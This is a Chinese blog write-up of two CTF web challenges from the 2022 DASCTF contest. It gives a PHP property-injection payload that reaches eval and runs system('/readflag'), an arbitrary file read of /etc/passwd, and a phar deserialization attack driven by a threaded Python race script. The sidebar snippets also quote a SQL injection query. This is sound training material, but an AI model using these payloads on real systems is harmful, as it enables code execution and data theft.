[2022DASCTF Apr X FATE 防疫挑战赛]web题目复现

最新推荐文章于 2024-04-16 18:22:28 发布
最新推荐文章于 2024-04-16 18:22:28 发布
阅读量970 收藏 1
点赞数 2
分类专栏: 刷题记录 文章标签: php web安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/124538896
版权

warmup-php

给了源码:

 <?php
spl_autoload_register(function($class){
    require("./class/".$class.".php");
});
highlight_file(__FILE__);
error_reporting(0);
$action = $_GET['action'];
$properties = $_POST['properties'];
class Action{

    public function __construct($action,$properties){

        $object=new $action();
        foreach($properties as $name=>$value)
            $object->$name=$value;
        $object->run();
    }
}

new Action($action,$properties);
?>

这里创建了一个未定义的类,在实例时会从/class目录下寻找,通过foreach循环对属性进行赋值,最后调用run方法。

附件给出了class目录文件

image-20220424204040869

先看看Base.php

image-20220424204305684

这里evaluateExpression函数中有eval和回调函数,很危险,我们最终目的应该就是调用函数进行命令执行

继续审计,run方法是在ListView中定义:

image-20220424211500114

跟进一下:

image-20220424211610619

preg_replace_callback — 执行一个正则表达式搜索并且使用一个回调进行替换。再看到renderSection

image-20220424211839350

那么调用链很清晰,通过ListView::run->ListView::renderContent->ListView::renderSection我们可以调用TestView类的任意方法,需要注意的是由于正则匹配的模式,我们需要令$this->template = "{TableBody}"才能正确执行。接下来进入TestView类:

image-20220424212547984

这里需要设置$data的值才能进入renderTableRow

image-20220424212849901

该方法中由于$this->rowHtmlOptionsExpression可控,我们可以进入到evaluateExpression方法,这里又回到开头

public function evaluateExpression($_expression_,$_data_=array())
    {
        if(is_string($_expression_))
        {
            extract($_data_);
            return eval('return '.$_expression_.';');
        }
        else
        {
            $_data_[]=$this;
            return call_user_func_array($_expression_, $_data_);
        }
    }

$_expression_是我们传入的$this->rowHtmlOptionsExpression参数,之后进入eval函数就可以实现命令执行。

payload:

GET: /?action=TestView
POST:
properties[template]={TableBody}&properties[rowHtmlOptionsExpression]=var_dump(system('/readflag'));&properties[data][1]=123

image-20220423165956403

soeasy_php

给了dockerfile

image-20220429083148077

简单测试一下上传,发现上传的文件都被转化成png格式,这里猜测可能有phar反序列化

先看一下源码,edit.php很可疑

image-20220429083402911

尝试一下任意文件读取,我们先上传一个payload再访问头像

png=../../../../../../etc/passwd&flag=1

image-20220430224435266

image-20220430231459038

成功,接下来读一下源码

upload.php

<?php
if (!isset($_FILES['file'])) {
    die("请上传头像");
}

$file = $_FILES['file'];
$filename = md5("png".$file['name']).".png";
$path = "uploads/".$filename;
if(move_uploaded_file($file['tmp_name'],$path)){
    echo "上传成功: ".$path;
};

edit.php

<?php
ini_set("error_reporting","0");
class flag{
    public function copyflag(){
        exec("/copyflag"); //以root权限复制/flag 到 /tmp/flag.txt,并chown www-data:www-data /tmp/flag.txt
        echo "SFTQL";
    }
    public function __destruct(){
        $this->copyflag();
    }

}

function filewrite($file,$data){
        unlink($file);
        file_put_contents($file, $data);
}


if(isset($_POST['png'])){
    $filename = $_POST['png'];
    if(!preg_match("/:|phar|\/\/|php/im",$filename)){
        $f = fopen($filename,"r");
        $contents = fread($f, filesize($filename));
        if(strpos($contents,"flag{") !== false){
            filewrite($filename,"Don't give me flag!!!");
        }
    }

    if(isset($_POST['flag'])) {
        $flag = (string)$_POST['flag'];
        if ($flag == "Give me flag") {
            filewrite("/tmp/flag.txt", "Don't give me flag");
            sleep(2);
            die("no no no !");
        } else {
            filewrite("/tmp/flag.txt", $flag);  //不给我看我自己写个flag。
        }
        $head = "uploads/head.png";
        unlink($head);
        if (symlink($filename, $head)) {
            echo "成功更换头像";
        } else {
            unlink($filename);
            echo "非正常文件,已被删除";
        };
    }
}

审计代码:

很明显是一个phar反序列化,但是这里需要用到竞争

  1. phar反序列化的触发
  2. 软链指向uploads/head.png
  3. 访问uploads/head.png拿到信息

先构造phar文件

<?php
class flag{
}
$a = new flag();
echo serialize($a);
$phar = new Phar("das.phar");
$phar -> startBuffering();
$phar -> setStub("<?php __HALT_COMPILER(); ?>");
$phar -> setMetadata($a); 
$phar -> addFromString("test.txt","testaaa");
$phar -> stopBuffering();
?>

构造后上传,构造脚本进行竞争

import requests
import threading
import time

url = "http://04925dbf-272a-499e-b705-0cb63534ad89.node4.buuoj.cn:81/"
png = "/uploads/head.png"
flag = "../../../../../../tmp/flag.txt"
phar = """phar://uploads/1bb92ea10c5d93a6a8cecbb98eb48598.png"""

def getpng():
    res = requests.get(url+png)
    print(res.text)

def linkflag():
    data = {
        "flag":"1",
        "png":flag
    }
    res = requests.post(url=url+"/edit.php",data=data)
    print(res.text)

def putphar():
    data = {
        "flag":"1",
        "png":phar
    }
    res = requests.post(url=url+"/edit.php",data=data)
    print(res.text)

while True:
    for i in range(10):
        t3 = threading.Thread(target=putphar)
        t3.start()
        t2 = threading.Thread(target=linkflag)
        t2.start()
        t1 = threading.Thread(target=getpng)
        t1.start()
    time.sleep(5)

image-20220502115054135

参考:

https://blog.csdn.net/m0_51078229/article/details/124411803

Snakin_ya
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DASCTF-三月赛-web复现
weixin_45800126的博客
04-15 859
title: DASCTF 三月赛 web复现 date: 2021-04-07 15:04:52 tags: DASCTF BestDB 0x01 源码给了查询语句 $sql = "SELECT * FROM users WHERE id = '$query' OR username = \"$query\""; 过滤单引号,但没过滤双引号,所以选择闭合后面的用户名进行union查询 查表名 query=-1"/**/union/**/select/**/group_concat(table_na.
[Re]2022DASCTF Apr X FATE 防疫挑战赛
PMR的博客
04-24 757
[Re]2022DASCTF Apr X FATE Crackme
Web2022DASCTF Apr X FATE 防疫挑战赛 题解(全)
最新发布
uuzeray的博客
04-16 672
spl_autoload_register函数实现了当程序遇到调用没有定义过的函数时,会去找./class/函数名.php路径下的php文件,并把它包含在程序中。于是退一步,用同样的方式去读/var/www/html目录下的upload.php和edit.php。尝试去读/proc/1/environ和/flag均响应403,显然权限不够。访问/uploads/head.png,成功读到/etc/passwd。建立了链接,同时flag也没有被覆盖,然后访问。监听,反弹shell,拿flag。
2022DASCTF Apr X FATE 防疫挑战赛 Writeup
末初的CSDN博客
04-25 2532
文章目录SimpleFlow熟悉的猫冰墩墩 废物选手的misc做题记录 SimpleFlow 首先tcp.stream eq 50中分析传入的执行命令的变量是$s,也就是参数substr($_POST["g479cf6f058cf8"],2) 找到对应的参数,然后去掉前面两位字符解码即可 cd "/Users/chang/Sites/test";zip -P PaSsZiPWorD flag.zip ../flag.txt;echo [S];pwd;echo [E] 得到压缩包密码:PaSsZi
2022DASCTF Apr X FATE 防疫挑战赛:熟悉的猫
qq_46230755的博客
04-24 930
很久没更新了,蛮更一下。 附件打开两个文件 kdbx文件的话,是一种windows 的密码文件,可以用KeePass软件开。 但是打开有密码,可以用passwordk kit 直接进行爆破。文件名为len5,所以选的是5位数字,得到密码13152 然后进去里面获取压缩包密码 打开压缩包,发现里面存在一个图片和一个hint hint有一个k,猜测可能是tupper解密。 同时,这个文件存在着零宽,利用网站得到了hint:22*160 网上直接找脚本进行修改,改一下k还有默认参数,得到了两个参数121和
2022DASCTF Apr X FATE 防疫挑战赛web复现
qq_58970968的博客
05-05 249
打开可看到是代码审计,现在的我的水平显然不会做: 所以参考了其他师父的wp;勉勉强强知道点流程,大概就是不断调用各种类中的方法; 首先拿到四个代码,如下: Base.php <?php class Base { public function __get($name) { $getter = 'get' . $name; if (method_exists($this, $getter)) { return $t
Apr2006_d3dx9_30_x64
10-11
Apr2006_d3dx9_30_x64
APR2007_d3dx9_33_x64
10-11
APR2007_d3dx9_33_x64
APR2007_d3dx10_33_x64
10-11
APR2007_d3dx10_33_x64
Packt.Publishing.Seam.2.x.Web.Development.Apr.2009
01-17
此教程从基础讲述了使用Seam的开发过程,是一本很好的入门英文教程,英文内容也比较简单
Apr2005_d3dx9_25_x64.cab
10-12
Apr2005_d3dx9_25_x64.cab
2022DASCTF Apr X FATE 防疫挑战赛 warmup-php
weixin_43610673的博客
04-24 2405
主页代码逻辑就是自动加载class下类文件,然后动态调用一个类,并设置成员变量。最后调用类的run()方法。 看uml类图其实就大致有数该实例化哪个类了,TestView 看这几个类文件的内容,很明显的页面模板生成代码,感觉是根据YII2框架的模板渲染提取的主要逻辑 先找漏洞点,在Base类中 再去找调用链,搜索run()方法,在ListView类中 接着跟到renderContent,会去调用类中的renderSection方法,$this->template需为{test}形式,才会被正则
easy_real复现
qq_61774705的博客
04-30 256
题目源码: import random import hashlib flag = 'xxxxxxxxxxxxxxxxxxxx' key = random.randint(1,10) for i in range(len(flag)): crypto += chr(ord(flag[i])^key) m = crypto的ascii十六进制 e = random.randint(1,100) print(hashlib.md5(e)) p = 64310413306776406422334034...
2022DASCTF Apr X FATE 防疫挑战赛
shinygod的博客
05-05 308
warmup-php 先分析一下index.php的内容,创建一个对象,并且循环赋值,然后调用run函数。 <?php spl_autoload_register(function($class){ require("./class/".$class.".php"); }); highlight_file(__FILE__); error_reporting(0); $action = $_GET['action']; $properties = $_POST['properties']; c
2022DASCTF Apr X FATE 防疫挑战赛 部分web复现
errorr0
04-28 1652
DAS的部分web复现
2022DASCTF Apr X FATE 防疫挑战赛 WriteUP
Huamang的博客
04-25 2217
文章目录MiscSimpleFlowWebwarmup-phpsoeasy_php Misc SimpleFlow 看流量大概是上传了一个后门,但是会对payload加密,这里发现有flag.txt被打包 后面的包里面发现flag.zip 但是打开需要密码,那么我们就要回去压缩的地方,看看给的什么密码,所以我们就得解开这个流量 @eval(@base64_decode($_POST['m8f8d9db647ecd'])); &e57fb9c067c677=o3 &g479cf6f058c
[MISC]2022DASCTF Apr X FATE 防疫挑战赛
RookieMOR的博客
05-06 918
1.SimpleFlow; 2.熟悉的猫; 3.冰墩墩; 1.SimpleFlow: 下载得到SimpleFlow的压缩包,解压得到SimpleFlow.pcapng,流量分析题目。查找 flag. ,可以知道一共有四个flag.txt文件,一个flag.zip文件。用kali的foremost指令可以分离出flag.zip文件,发现flag.zip需要密码。 再追踪每个flag.txt。 发现蚁剑流量,一个一个base64解码, 在其中一个txt文件中得到: Y2QgIi9Vc2Vy.
有效年利率和年化百分比利率
热门推荐
u012249454的博客
07-31 1万+
有效年利率(effective annual rate,EAR):一年期投资价值增长百分比。 年化利率是把当前收益率(日收益率、周收益率、月收益率)换算成年从而得出的收益率。年化利率是一种理论的收益率,并不是已取得的实际收益率。如果投资项目标明的年化收益率是20%,而其仅借款6个月,则到期收益率为10%。年化利率12%指的是,在您出借的本金不减少的情况下,您一年后的利息将达到您出借本金的12%。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值